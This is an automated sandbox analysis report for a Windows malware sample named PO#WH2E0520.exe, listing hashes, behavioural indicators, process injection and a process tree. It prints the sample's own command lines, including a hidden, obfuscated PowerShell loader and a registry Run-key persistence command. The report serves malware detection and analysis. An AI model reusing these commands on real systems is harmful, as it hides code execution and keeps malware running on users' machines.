Analysis
  max time kernel:  147s
  max time network: 151s
  platform:         windows7_x64
  resource:         win7-20231129-en
  resource tags:    arch:x64, arch:x86, image:win7-20231129-en, locale:en-us, os:windows7-x64, system
  submitted:        13/06/2024, 09:38
Static task: static1

Behavioral task: behavioral1
  Sample:   PO#WH2E0520.exe
  Resource: win7-20231129-en

Behavioral task: behavioral2
  Sample:   PO#WH2E0520.exe
  Resource: win10v2004-20240508-en
General
  Target: PO#WH2E0520.exe
  Size:   988KB
  MD5:    328c8f1b566488c8e7f8cd0951c173d4
  SHA1:   2c45dce433d4dd782f0ed7c9a62494a1bdce13aa
  SHA256: d220538747164b56b83a6f324adae9b05a1d64a861ddb512c6139a12ca6c31a8
  SHA512: d0579cfd4fd61c611b8af986f8579e563f2abac814b260455e5d810076d609ff82bf8d7c7473ec3542e6035265308cb9bbf4fc7d9fb98b468bae74c12883367f
  SSDEEP: 24576:V4ezTAAfvu922zkq9+qDlcv3sWhegcKyJc:V4WAAfD2zk47lG3sWhegcXO
Malware Config
Signatures
Command and Scripting Interpreter: PowerShell (1 TTPs, 1 IoCs)
  Run Powershell and hide display window.
  pid   Process
  2900  powershell.exe

Loads dropped DLL (2 IoCs)
  pid   Process
  2900  powershell.exe
  2800  Nepotism.exe

Adds Run key to start application (2 TTPs, 1 IoCs)
  description: Set value (str)
  ioc:         \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Windows\CurrentVersion\Run\Disadvantageous94 = "%Curio% -windowstyle minimized $Nonexportation=(Get-ItemProperty -Path 'HKCU:\\Skidens\\').Scottify;%Curio% ($Nonexportation)"
  Process:     reg.exe

Drops file in System32 directory (1 IoCs)
  description: File opened for modification
  ioc:         C:\Windows\SysWOW64\driftschefernes.ini
  Process:     PO#WH2E0520.exe

Suspicious use of NtSetInformationThreadHideFromDebugger (2 IoCs)
  pid   Process
  2900  powershell.exe
  2800  Nepotism.exe

Suspicious use of SetThreadContext (1 IoCs)
  description                          pid   Process         procid_target
  PID 2900 set thread context of 2800  2900  powershell.exe  32

Drops file in Program Files directory (2 IoCs)
  description                   ioc                                                   Process
  File created                  C:\Program Files (x86)\Common Files\twig\Monetising.lnk  PO#WH2E0520.exe
  File opened for modification  C:\Program Files (x86)\inspiredly.snu                  PO#WH2E0520.exe

Drops file in Windows directory (1 IoCs)
  description: File opened for modification
  ioc:         C:\Windows\Fonts\undispersing\frelserens.ini
  Process:     PO#WH2E0520.exe

Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).

Modifies registry key (1 TTPs, 1 IoCs)
  pid   Process
  2464  reg.exe

Suspicious behavior: EnumeratesProcesses (8 IoCs)
  pid   Process
  2900  powershell.exe  (8 identical rows)

Suspicious behavior: MapViewOfSection (1 IoCs)
  pid   Process
  2900  powershell.exe

Suspicious use of AdjustPrivilegeToken (1 IoCs)
  description              pid   Process
  Token: SeDebugPrivilege  2900  powershell.exe

Suspicious use of WriteProcessMemory (22 IoCs)
  description                       pid   Process          procid_target
  PID 1960 wrote to memory of 2900  1960  PO#WH2E0520.exe  28
  PID 1960 wrote to memory of 2900  1960  PO#WH2E0520.exe  28
  PID 1960 wrote to memory of 2900  1960  PO#WH2E0520.exe  28
  PID 1960 wrote to memory of 2900  1960  PO#WH2E0520.exe  28
  PID 2900 wrote to memory of 2648  2900  powershell.exe   30
  PID 2900 wrote to memory of 2648  2900  powershell.exe   30
  PID 2900 wrote to memory of 2648  2900  powershell.exe   30
  PID 2900 wrote to memory of 2648  2900  powershell.exe   30
  PID 2900 wrote to memory of 2800  2900  powershell.exe   32
  PID 2900 wrote to memory of 2800  2900  powershell.exe   32
  PID 2900 wrote to memory of 2800  2900  powershell.exe   32
  PID 2900 wrote to memory of 2800  2900  powershell.exe   32
  PID 2900 wrote to memory of 2800  2900  powershell.exe   32
  PID 2900 wrote to memory of 2800  2900  powershell.exe   32
  PID 2800 wrote to memory of 2616  2800  Nepotism.exe     33
  PID 2800 wrote to memory of 2616  2800  Nepotism.exe     33
  PID 2800 wrote to memory of 2616  2800  Nepotism.exe     33
  PID 2800 wrote to memory of 2616  2800  Nepotism.exe     33
  PID 2616 wrote to memory of 2464  2616  cmd.exe          35
  PID 2616 wrote to memory of 2464  2616  cmd.exe          35
  PID 2616 wrote to memory of 2464  2616  cmd.exe          35
  PID 2616 wrote to memory of 2464  2616  cmd.exe          35
Processes (indentation shows parent/child depth)

  [1] C:\Users\Admin\AppData\Local\Temp\PO#WH2E0520.exe  (PID 1960)
      command line: "C:\Users\Admin\AppData\Local\Temp\PO#WH2E0520.exe"
      - Drops file in System32 directory
      - Drops file in Program Files directory
      - Drops file in Windows directory
      - Suspicious use of WriteProcessMemory

    [2] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  (PID 2900)
        command line: "powershell.exe" -windowstyle hidden "$Infanterienheden=Get-Content 'C:\Users\Admin\AppData\Local\skuespillerevnernes\Kilders219\Antiprelatism.Syn';$Potentializes=$Infanterienheden.SubString(17231,3);.$Potentializes($Infanterienheden)"
        - Command and Scripting Interpreter: PowerShell
        - Loads dropped DLL
        - Suspicious use of NtSetInformationThreadHideFromDebugger
        - Suspicious use of SetThreadContext
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious behavior: MapViewOfSection
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory

      [3] C:\Windows\SysWOW64\cmd.exe  (PID 2648)
          command line: "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"

      [3] C:\Users\Admin\AppData\Local\Temp\Nepotism.exe  (PID 2800)
          command line: "C:\Users\Admin\AppData\Local\Temp\Nepotism.exe"
          - Loads dropped DLL
          - Suspicious use of NtSetInformationThreadHideFromDebugger
          - Suspicious use of WriteProcessMemory

        [4] C:\Windows\SysWOW64\cmd.exe  (PID 2616)
            command line: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Disadvantageous94" /t REG_EXPAND_SZ /d "%Curio% -windowstyle minimized $Nonexportation=(Get-ItemProperty -Path 'HKCU:\Skidens\').Scottify;%Curio% ($Nonexportation)"
            - Suspicious use of WriteProcessMemory

          [5] C:\Windows\SysWOW64\reg.exe  (PID 2464)
              command line: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Disadvantageous94" /t REG_EXPAND_SZ /d "%Curio% -windowstyle minimized $Nonexportation=(Get-ItemProperty -Path 'HKCU:\Skidens\').Scottify;%Curio% ($Nonexportation)"
              - Adds Run key to start application
              - Modifies registry key
Network
MITRE ATT&CK Enterprise v15
Downloads

  Filesize: 50KB
  MD5:      a29b610601c6446ca5d925ff29d27383
  SHA1:     f80a215550b22baed58aac08bfed5726f0d7de60
  SHA256:   ed86d585901199bf8b1859e868b006718c326a5b2c1d27c7f69554f2f37e5107
  SHA512:   b159fd355542170bbfdf093cbfb6f8da169209f076cb2cb79d94af0146d0a04a4dd44a328b389bcf2fa333ad0ce14424bbf89c5e93e1160cadb4469f66184b6e

  Filesize: 292KB
  MD5:      0e1c858b4256ec39ba6b617927aee0ca
  SHA1:     726e462e1e9e41270174722405625cb96509b30b
  SHA256:   88c6e14cb89d04fb1fab4fc45f62c903af1a9981622260de27cdb7e3e853b782
  SHA512:   3c6949dec4abf79b735b8c50beec3c3fcafec17aef17da5b10ddfeaab3d5dbcc590efe0e8b706a1706b5054c1cd6b55c37aa3fbbacd5553259f33a9ca8a8ee1e

  Filesize: 988KB
  MD5:      328c8f1b566488c8e7f8cd0951c173d4
  SHA1:     2c45dce433d4dd782f0ed7c9a62494a1bdce13aa
  SHA256:   d220538747164b56b83a6f324adae9b05a1d64a861ddb512c6139a12ca6c31a8
  SHA512:   d0579cfd4fd61c611b8af986f8579e563f2abac814b260455e5d810076d609ff82bf8d7c7473ec3542e6035265308cb9bbf4fc7d9fb98b468bae74c12883367f